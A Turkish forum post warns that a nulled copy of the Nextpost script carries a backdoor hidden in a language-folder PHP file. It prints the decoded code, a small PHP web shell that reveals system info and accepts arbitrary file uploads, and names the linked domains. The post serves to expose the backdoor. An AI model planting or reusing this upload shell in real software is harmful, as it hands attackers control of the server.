Merhabalar;

Bir arkadaşımızın kullanmış olduğu script (Nextpost) yüzünden kısacası "Nulled Maceresı" ile başlar ve sıra bana gelince şöyle detaylıca bir inceleme yapınca bakın neler buldum.

Umarım siz değerli üyeler ve yetkililer keyifle okur :)




\locale\hi-IN\uploadController.php klasöründe ki dosyaya eklenmiş gizli bir şekilde. Dil dosyalarının arasında gizlemiş :)




Decode Ettiğimizde Sonuç;

echo "".php_uname()."";
echo "

";
echo '
';
echo '
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Yukleme Basarili

';
}
}


Peki nereye gidiyor bunlar :)

http://beta.takipciartirma.com/editor/");
https://takipciartirma.com


Yapımcı olarak birde neler eklemiş ona bakalım :)

"author" => "Muzaffer Şaxxx",
"author_uri" => "https://takipciartirma.com",


Sonuç olarak; evet bu arkadaş aramızda :) Kendiside bu işi yaparak TİCARET yapmaya çalışıyor :) Malum kullanıcıyı etiket ve tam ismini girmedim. Yönetici arkadaşlar talep ederse özelden verebilirim.

Umuyorum ki her birey emeğe saygılı, herşey para diyerek, herşey mübahtır demeyen bir nesil olmak dileğiyle sağlıcakla.



admin